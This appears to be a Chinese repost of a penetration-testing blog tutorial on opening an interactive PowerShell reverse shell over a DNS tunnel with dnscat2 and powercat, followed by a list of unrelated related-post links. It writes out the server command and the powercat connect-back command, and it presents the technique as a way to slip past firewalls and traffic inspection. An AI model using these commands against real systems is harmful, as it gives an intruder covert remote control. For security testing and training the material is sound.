通过DNS通道传输的交互式PowerShell脚本
摘自:http://www.freebuf.com/sectool/90616.html
欢迎来到一周PowerShell脚本的第五天,今天我们将讨论使用ICMP和DNS的交互式PowerShell脚本。
通常情况下防火墙都不会主动过滤ICMP和DNS数据包,这就让我们可以使用它们。下面就让我们来看看具体怎么利用吧。
对于DNS来说,我们需要使用Ron Bowes的dnscat2(https://github.com/iagox86/dnscat2)作为服务端。当然如果目标机器是Windows系统,那么也可以使用powercat(https://github.com/besimorhino/powercat)。我们之前讨论过使用powercat了,那么下面来看看如何使用dnscat2。
首先,使用如下命令开启dnscat2服务端:
root@Kali:~/Desktop# ruby ./dnscat2.rb reversedns-shell.org
然后使用如下命令返回连接:
PS C:\> powercat -c 192.168.254.226 -p 53 -dns reversedns-shell.org
效果如下:
很好!我们得到了一个通过DNS信道传输的交互式PowerShell脚本。
这里如果我们查看Wireshark的话不会发现有什么问题:
pcap包可以在这里下载到https://drive.google.com/folderview?id=0B-Hsu8q12kG3fmV6YUpOOVJzaC05cnRRZ3huV2xZUkNlOHplSkFqZ0VjVFNpU2NTZGpUN1E&usp=sharing
(注:译者已将数据包搬运到国内云盘:链接:http://pan.baidu.com/s/1c1dBnCO 密码:59oy)
上面的不是PowerShell脚本对吧,其实Nishang有一些使用DNS的脚本可以执行命令、脚本和msf的shellcode利用,但它们都不是交互式的脚本,所以这里就不提了,如果感兴趣可以查看之前的博文http://www.labofapenetrationtester.com/2015/01/fun-with-dns-txt-records-and-powershell.html。
转载于:https://www.cnblogs.com/bonelee/p/7729459.html
通过DNS通道传输的交互式PowerShell脚本相关推荐
- DNS域传输漏洞利用总结
操作基本的步骤是: 1) 输入nslookup命令进入交互式shell 2) Server 命令参数设定查询将要使用的DNS服务器 3) Ls命令列出某个域中的所有域名 4) Exit命令退出程序 攻 ...
- [论文阅读] (17)CCS2019 针对PowerShell脚本的轻量级去混淆和语义感知攻击检测(经典)
<娜璋带你读论文>系列主要是督促自己阅读优秀论文及听取学术讲座,并分享给大家,希望您喜欢.由于作者的英文水平和学术能力不高,需要不断提升,所以还请大家批评指正,非常欢迎大家给我留言评论,学 ...
- Kali Linux渗透测试之被动信息收集(一)——nslookup、dig、DNS区域传输,DNS字典爆破,DNS注册信息
一.被动信息收集 1.被动信息搜集 公开渠道可获得信息: 与目标系统不产生直接交互: 尽量避免留下痕迹: 2.搜集的内容 IP地址段,域名信息,邮件地址,文档图片数据,公司地址,公司组织架构.联系电话 ...
- Kali Linux渗透测试之被动信息收集(一)——nslookup、dig、DNS区域传输、DNS字典爆破、DNS注册信息
1. 被动信息搜集 (1)被动信息搜集 公开渠道可获得的信息: 与目标系统不产生直接交互: 尽量避免留下痕迹: (2)搜集的内容 IP地址段.域名信息.邮件地址.文档图片数据.公司地址.公司组织架构. ...
- nuget打包文件丢失如何使用powershell脚本解决
本文介绍的是在使用nuget打包的过程中遇到丢失文件的问题的时候使用powershell脚本实现的解决办法,非常的巧妙 对于进行nuget打包时,有时我们需要添加一个配置文件,就是一些文本文件,而这些 ...
- 详解Linux交互式shell脚本中创建对话框实例教程
详解Linux交互式shell脚本中创建对话框实例教程 本教程我们通过实现来讲讲Linux交互式shell脚本中创建各种各样对话框,对话框在Linux中可以友好的提示操作者,感兴趣的朋友可以参考学习一 ...
- 设定Windows计划任务定期执行PowerShell脚本
因PowerShel有这特殊的安全策略,在设定Windows计划任务定期执行PowerShell脚本时有些细节需要注意. (1)在本机编写一个测试脚本,保存为PS1脚本: (2)设置Powershel ...
- 开机自启动Powershell脚本
目录 目录 前言 修改注册表 写批处理 以管理员方式打开Posershell程序 修改PS-profile 最后 前言 这绝B是个非常受用的技能. 修改注册表 Open Registry Editor ...
- 创建交互式shell脚本对话框
当你在终端环境下安装新的软件时,你可以经常看到信息对话框弹出,需要你的输入,比如:RHEL/CentOS自带的setup,对话框的类型有密码箱.检查表.菜单等等.他们可以引导你以一种直观的方式输入必要 ...
最新文章
- python父类和子类_python子类父类
- python编程难吗-Python、C+这些编程语言难吗?十岁女孩告诉你答案
- 在Windows IoT上使用网络摄像头
- VxWorks中信号量实现任务间通信与同步机制分析
- 小学计算机国培研修总结,小学数学国培研修总结
- windows php cli 后台运行_【续】windows环境redis未授权利用方式梳理
- boost::units模块实现异构单元片段
- 深度学习总结:DQN原理,算法及pytorch方式实现
- ARM指令寻址方式之: 内存访问指令寻址
- jquery源码之低调的回调函数队列--Callbacks
- 苹果cms v8模板 高仿爱奇艺带PC+手机模板
- MongoDB 教程三: 高级查询 (SQL到MongoDB映射表)
- Vue 电商PC后台管理(ElementUI)
- skywalking搭建与使用
- 有什么看到就想要抄下来的句子?
- JSP中EL表达式不起作用
- dedecms 会员发布的信息后台未审核,前台显示审核修改
- 有乐窝一周精选(二)
- (15.1.16)项目管理简述
- Photoshop2022全版本软件安装包(附图文教程、windows\mac系统全版本软件)